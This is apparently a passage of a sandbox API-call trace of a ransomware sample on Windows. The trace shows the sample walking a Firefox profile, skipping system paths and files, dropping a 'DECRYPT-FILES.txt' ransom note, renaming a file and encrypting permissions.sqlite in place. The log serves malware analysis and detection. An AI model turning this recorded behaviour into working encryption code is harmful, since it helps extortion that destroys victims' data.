lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0081.542] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf") returned 101 [0081.542] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.CrlkH8j") returned 109 [0081.542] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\mimeTypes.rdf.CrlkH8j" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\mimetypes.rdf.crlkh8j"), dwFlags=0x0) returned 1 [0081.542] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.543] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.543] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.543] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb26740e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="minidumps", cAlternateFileName="MINIDU~1")) returned 1 [0081.543] lstrcmpW (lpString1="minidumps", lpString2=".") returned 1 [0081.543] lstrcmpW (lpString1="minidumps", lpString2="..") returned 1 [0081.543] lstrcatW (in: lpString1="minidumps", lpString2="\\" | out: lpString1="minidumps\\") returned="minidumps\\" [0081.543] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="minidumps\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\" [0081.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\Program Files") returned 0x0 [0081.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch=":\\Windows") returned 0x0 [0081.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\Games\\") returned 0x0 [0081.543] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\Tor Browser\\") returned 0x0 [0081.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\ProgramData\\") returned 0x0 [0081.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0081.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0081.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0081.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\All Users") returned 0x0 [0081.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\IETldCache\\") returned 0x0 [0081.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\Local Settings\\") returned 0x0 [0081.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="\\AppData\\Local") returned 0x0 [0081.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="AhnLab") returned 0x0 [0081.544] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0081.544] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\") returned 98 [0081.544] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.544] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\\\jkbimi8.tmp") returned 110 [0081.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\minidumps\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0081.545] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\") returned 98 [0081.545] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0081.545] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\\\DECRYPT-FILES.txt") returned 116 [0081.545] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\minidumps\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0081.545] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0081.546] CloseHandle (hObject=0x464) returned 1 [0081.547] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\") returned 98 [0081.547] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*" [0081.547] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xacccfd80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xacccfd80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0081.547] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.547] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xacccfd80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xacccfd80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.547] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.547] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.547] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacccfd80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xacccfd80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xacccfd80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0081.547] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0081.547] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacccfd80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xacccfd80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xacccfd80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0081.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0081.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0081.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0081.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0081.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0081.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0081.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0081.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0081.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0081.547] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0081.547] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.547] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0081.547] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0081.547] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0081.547] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0081.547] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\") returned 98 [0081.547] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.547] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\" [0081.547] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\jkbimi8.tmp" [0081.548] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\minidumps\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\minidumps\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0081.548] CloseHandle (hObject=0x0) returned 0 [0081.548] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.548] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacccfd80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xacccfd80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xacccfd80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0081.548] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0081.548] CloseHandle (hObject=0x460) returned 1 [0081.548] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x80696ec0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="parent.lock", cAlternateFileName="PARENT~1.LOC")) returned 1 [0081.548] lstrcmpiW (lpString1="parent.lock", lpString2="DECRYPT-FILES.txt") returned 1 [0081.548] lstrcmpiW (lpString1="parent.lock", lpString2="autorun.inf") returned 1 [0081.548] lstrcmpiW (lpString1="parent.lock", lpString2="boot.ini") returned 1 [0081.549] lstrcmpiW (lpString1="parent.lock", lpString2="desktop.ini") returned 1 [0081.549] lstrcmpiW (lpString1="parent.lock", lpString2="ntuser.dat") returned 1 [0081.549] lstrcmpiW (lpString1="parent.lock", lpString2="iconcache.db") returned 1 [0081.549] lstrcmpiW (lpString1="parent.lock", lpString2="bootsect.bak") returned 1 [0081.549] lstrcmpiW (lpString1="parent.lock", lpString2="ntuser.dat.log") returned 1 [0081.549] lstrcmpiW (lpString1="parent.lock", lpString2="thumbs.db") returned -1 [0081.549] lstrcmpiW (lpString1="parent.lock", lpString2="Bootfont.bin") returned 1 [0081.549] lstrlenW (lpString="parent.lock") returned 11 [0081.549] lstrcmpiW (lpString1="lock", lpString2="lnk") returned 1 [0081.549] lstrcmpiW (lpString1="lock", lpString2="exe") returned 1 [0081.549] lstrcmpiW (lpString1="lock", lpString2="sys") returned -1 [0081.549] lstrcmpiW (lpString1="lock", lpString2="dll") returned 1 [0081.549] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0081.549] lstrlenW (lpString="parent.lock") returned 11 [0081.549] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0081.549] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="parent.lock" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" [0081.549] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\parent.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\parent.lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0081.550] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=0) returned 1 [0081.550] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0081.550] CloseHandle (hObject=0x0) returned 0 [0081.550] CloseHandle (hObject=0x460) returned 1 [0081.550] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.550] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb43eb830, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb43eb830, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3b3f6e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="permissions.sqlite", cAlternateFileName="PERMIS~1.SQL")) returned 1 [0081.550] lstrcmpiW (lpString1="permissions.sqlite", lpString2="DECRYPT-FILES.txt") returned 1 [0081.550] lstrcmpiW (lpString1="permissions.sqlite", lpString2="autorun.inf") returned 1 [0081.551] lstrcmpiW (lpString1="permissions.sqlite", lpString2="boot.ini") returned 1 [0081.551] lstrcmpiW (lpString1="permissions.sqlite", lpString2="desktop.ini") returned 1 [0081.551] lstrcmpiW (lpString1="permissions.sqlite", lpString2="ntuser.dat") returned 1 [0081.551] lstrcmpiW (lpString1="permissions.sqlite", lpString2="iconcache.db") returned 1 [0081.551] lstrcmpiW (lpString1="permissions.sqlite", lpString2="bootsect.bak") returned 1 [0081.551] lstrcmpiW (lpString1="permissions.sqlite", lpString2="ntuser.dat.log") returned 1 [0081.551] lstrcmpiW (lpString1="permissions.sqlite", lpString2="thumbs.db") returned -1 [0081.551] lstrcmpiW (lpString1="permissions.sqlite", lpString2="Bootfont.bin") returned 1 [0081.551] lstrlenW (lpString="permissions.sqlite") returned 18 [0081.551] lstrcmpiW (lpString1="sqlite", lpString2="lnk") returned 1 [0081.551] lstrcmpiW (lpString1="sqlite", lpString2="exe") returned 1 [0081.551] lstrcmpiW (lpString1="sqlite", lpString2="sys") returned -1 [0081.551] lstrcmpiW (lpString1="sqlite", lpString2="dll") returned 1 [0081.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0081.551] lstrlenW (lpString="permissions.sqlite") returned 18 [0081.551] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0081.551] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="permissions.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" [0081.551] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.551] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\permissions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\permissions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0081.551] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=65536) returned 1 [0081.552] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0081.552] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0081.594] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0081.594] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0081.594] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.603] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0081.603] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0081.605] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.605] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0081.606] CloseHandle (hObject=0x464) returned 1 [0081.606] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.606] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0081.607] CloseHandle (hObject=0x0) returned 0 [0081.607] CloseHandle (hObject=0x460) returned 1 [0081.607] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.607] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.607] GetTickCount () returned 0x114ce19 [0081.607] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.608] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0081.608] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0081.608] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.608] lstrlenA (lpString="kernel32.dll") returned 12 [0081.608] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0081.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0081.608] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0081.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0081.608] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0081.608] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0081.608] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0081.609] lstrlenA (lpString="ADDATOMA") returned 8 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0081.609] lstrlenA (lpString="ADDATOMW") returned 8 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0081.609] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0081.609] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | 